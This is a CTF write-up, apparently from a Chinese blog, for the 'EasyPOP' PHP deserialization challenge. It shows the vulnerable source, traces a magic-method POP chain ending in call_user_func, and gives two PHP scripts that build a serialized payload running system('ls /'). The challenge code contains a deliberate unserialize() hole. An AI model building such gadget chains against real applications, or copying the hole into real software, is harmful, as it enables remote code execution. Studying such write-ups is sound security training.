
DASCTF X GFCTF 2022十月挑战赛

时间:2022-10-23 20:33:27浏览次数:63  

DASCTF X GFCTF 2022十月挑战赛

EasyPOP

<?php
// CTF challenge entry script. Prints this file's own highlighted source on every request,
// so the class definitions below are fully visible to whoever calls the page.
highlight_file(__FILE__);
// Turns off all PHP error reporting, so failures further down produce no diagnostics.
error_reporting(0);

/**
 * Stores a callable name plus one argument and calls them when the object is used as a function.
 *
 * Security note: both values are plain object state. If an instance can be produced from
 * untrusted serialized data, __invoke() becomes an arbitrary-function-call sink.
 */
class fine
{
    // Callable passed as the first argument of call_user_func() in __invoke().
    private $cmd;
    // Single argument handed to that callable.
    private $content;

    /**
     * @param mixed $cmd     Stored as the callable to run.
     * @param mixed $content Stored as the callable's only argument.
     */
    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    /**
     * Runs when the object itself is called like a function.
     *
     * No validation or allow-list is applied to $cmd before it is invoked; the return value
     * of the call is discarded.
     */
    public function __invoke()
    {
        call_user_func($this->cmd, $this->content);
    }

    /**
     * Runs when an instance is restored by unserialize(): clears $cmd and terminates the script.
     *
     * This is the only guard this listing places on deserialized instances. A check inside
     * __wakeup() should not be relied on as the defence; the robust control is to keep
     * untrusted data out of unserialize() in the first place.
     */
    public function __wakeup()
    {
        $this->cmd = "";
        die("Go listen to Jay Chou's secret-code! Really nice");
    }
}

/**
 * Display helper that formats a "practice duration" line for whatever is stored in $ctf.
 */
class show
{
    // Either a display string (normal use) or, in __toString(), an object expected to offer show().
    public $ctf;
    public $time = "Two and a half years";

    /**
     * @param mixed $ctf Value stored in $this->ctf; not type-checked.
     */
    public function __construct($ctf)
    {
        $this->ctf = $ctf;
    }


    /**
     * Runs when the object is used in string context (for example by echo).
     *
     * Delegates to show() on whatever $ctf holds. The target type is not checked, so the call
     * dispatches on any object placed there; if show() is not accessible on that object,
     * PHP routes the call to its __call() handler.
     */
    public function __toString()
    {
        return $this->ctf->show();
    }

    /**
     * Builds the display line by concatenating $ctf, a fixed label and $time.
     *
     * @return string
     */
    public function show(): string
    {
        return $this->ctf . ": Duration of practice: " . $this->time;
    }


}

/**
 * Name/password holder whose magic methods (__sleep, __get, __destruct) act on its own state.
 *
 * Every property can be chosen by whoever supplies a serialized instance, so each magic
 * method below must be read as operating on attacker-controlled values once unserialize()
 * is reachable with request data.
 */
class sorry
{
    private $name;
    private $password;
    public $hint = "hint is depend on you";
    // Invoked as a function by __get(); never assigned by this class's own constructor.
    public $key;

    /**
     * @param mixed $name     Stored in $this->name.
     * @param mixed $password Stored in $this->password.
     */
    public function __construct($name, $password)
    {
        $this->name = $name;
        $this->password = $password;
    }

    /**
     * Runs when the object is serialized; replaces $hint with a new secret_code instance.
     *
     * NOTE(review): PHP expects __sleep() to return an array of property names to serialize;
     * this method returns nothing.
     */
    public function __sleep()
    {
        $this->hint = new secret_code();
    }

    /**
     * Runs when an inaccessible or undefined property is read on this object.
     *
     * The requested property name is discarded: $name is overwritten with $this->key, which
     * is then called as a function. Nothing is returned, so the property read yields null.
     */
    public function __get($name)
    {
        $name = $this->key;
        $name();
    }


    /**
     * Runs when the object is destroyed, which includes objects created by unserialize().
     */
    public function __destruct()
    {
        // Loose (==) comparison of two properties that are both part of the object's state.
        if ($this->password == $this->name) {

            // echo converts $hint to a string; if $hint is an object, its __toString() runs.
            echo $this->hint;
        // Assignment, not comparison: sets name to "jay" and is always truthy,
        // so the final else branch below can never execute.
        } else if ($this->name = "jay") {
            secret_code::secret();
        } else {
            echo "This is our code";
        }
    }


    /**
     * @return mixed The current value of $this->password.
     */
    public function getPassword()
    {
        return $this->password;
    }

    /**
     * Overwrites the stored password.
     *
     * @param mixed $password New value for $this->password.
     */
    public function setPassword($password): void
    {
        $this->password = $password;
    }


}

/**
 * Loads the challenge hint and forwards inaccessible method calls to same-named methods.
 */
class secret_code
{
    // Object whose `secret` property is read by show(); never assigned inside this class.
    protected $code;

    /**
     * Includes hint.php once and calls hint().
     *
     * hint() is not defined in this listing; presumably hint.php provides it.
     */
    public static function secret()
    {
        include_once "hint.php";
        hint();
    }

    /**
     * Runs when an inaccessible or undefined method is called on the object.
     *
     * Re-dispatches to the method of the same name from inside the class, where private
     * methods are callable. The effect is that `private` on show() does not stop outside
     * callers from reaching it. $arguments are ignored and the result is not returned.
     */
    public function __call($name, $arguments)
    {
        $num = $name;
        $this->$num();
    }

    /**
     * Reads the `secret` property of whatever $code holds.
     *
     * The type of $code is not checked; on an object where `secret` is missing or
     * inaccessible, the read is handled by that object's __get().
     */
    private function show()
    {
        return $this->code->secret;
    }
}


// Request handling. The raw `pop` query parameter is untrusted input.
if (isset($_GET['pop'])) {
    // SECURITY: unserialize() on request data lets the sender instantiate any class defined
    // above with arbitrary property values, and PHP then runs their magic methods
    // (__wakeup, __destruct, __toString, ...). This is the root cause of the issue the
    // writeup discusses. Prefer a data-only format such as JSON; if unserialize() must stay,
    // pass ['allowed_classes' => false] (or an explicit allow-list) as the second argument.
    $a = unserialize($_GET['pop']);
    // Assumes the result is an object exposing setPassword(); nothing checks its type.
    // The new password is md5 of an mt_rand() value, which is not a cryptographic random source.
    $a->setPassword(md5(mt_rand()));
} else {
    // Default path with no input: print the formatted line for a fixed name.
    $a = new show("Ctfer");
    echo $a->show();
}
pop链的构造

切入口 sorry类的析构函数,突破口fine类的__invoke函数中的call_user_func函数

sorry的析构函数有echo $this->hint  联想一下__toString函数
show类有this->ctf->show() 联想一下__call函数或者看看其他类有show函数没
secret_code类的show函数有this->code->secret,secret属性是所有类都没有的,自然联想到__get,sorry类的__get函数有$name(),联想到__invoke,fine类的__invoke函数有call_user_func函数,也就是突破口

sorry.__destruct -> show.__toString -> secret_code.__call -> secret_code.show() -> sorry.__get -> fine.__invoke -> call_user_func函数

EXP:

<?php
// Writeup's payload generator for the EasyPOP listing above.
// The classes below are property-only stand-ins that reuse the challenge's class and
// property names; no methods are declared because this script only builds and serializes
// an object graph. All properties are public here, unlike the private/protected ones in
// the challenge (the writeup attributes this to PHP 7 behaviour).
class fine
{
    public $cmd;
    public $content;
}
class show
{
    public $ctf;
    public $time = "Two and a half years";
}
class sorry
{
    public $name;
    public $password;
    public $hint = "hint is depend on you";
    public $key;
}

class secret_code
{
    public $code;
}
$Fine = new fine();
$Show = new show();
$Sorry = new sorry();
$Sorry2 = new sorry();
$Secret = new secret_code();

// Object graph mirroring the chain described in the text: each object is stored in the
// property that the challenge's corresponding magic method reads.
// Defensive takeaway: every hop is an ordinary magic method of an application class, so
// the fix belongs at the unserialize() call (no untrusted input, or an allow-list of
// classes), not in patching a single class.
$Sorry->name = 'cc';
$Sorry->password = 'cc';
$Sorry->hint = $Show;
$Show->ctf = $Secret;
$Secret->code = $Sorry2;
$Sorry2->name = 'cc';
$Sorry2->password = 'cc';
$Sorry2->key = $Fine;
// Function name and argument that reach call_user_func() in the challenge's fine::__invoke().
$Fine->cmd = 'system';
$Fine->content = 'ls /';
// NOTE(review): the writeup states that fine::__wakeup still has to be bypassed; that step
// is not part of this listing.
$a = serialize($Sorry);
echo $a
?>

注意:fine类的__wakeup函数会在反序列化时把cmd清空并直接die,需要绕过。

补充:另一种写法保留了原题的private/protected属性,序列化结果里会带有不可见字符(\0),所以一定要url编码。这种写法适用于php7以下版本;上边把属性全部改成public的写法依赖php7的特性。

<?php
// Variant of the writeup's payload generator that keeps the challenge's private/protected
// property visibility and fills the properties through constructors instead of direct
// assignment. Serialized private/protected property names contain NUL bytes, which is why
// the output is passed through urlencode() at the end.
class fine
{
    private $cmd;
    private $content;
    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }
}
class show
{
    public $ctf;
    public $time = "Two and a half years";
    // Unlike the challenge's show, this stand-in constructor also takes $time.
    public function __construct($ctf, $time)
    {
        $this->ctf = $ctf;
        $this->time = $time;
    }
}
class sorry
{
    private $name;
    private $password;
    public $hint = "hint is depend on you";
    public $key;
    // Unlike the challenge's sorry, this stand-in constructor also sets $hint and $key.
    public function __construct($name, $password,$hint,$key)
    {
        $this->name = $name;
        $this->password = $password;
        $this->hint  = $hint;
        $this->key = $key;
    }
}
class secret_code
{
    protected $code;
    public function __construct($code)
    {
        $this->code = $code;
    }
}
// Same nesting as the first listing, written as one expression:
// sorry -> show -> secret_code -> sorry -> fine.
// NOTE(review): as with the first listing, the fine::__wakeup step mentioned in the writeup
// is not shown here.
$Sorry= new sorry('cc','cc',new show(new secret_code(new sorry('cc','cc','cc',new fine('system','ls'))),'cc'),'cc');

$c = serialize($Sorry);
// URL-encode so the NUL bytes in the serialized string survive transport as a query parameter.
echo urlencode($c);
?>

From: https://www.cnblogs.com/yhchen-blogs/p/16819432.html
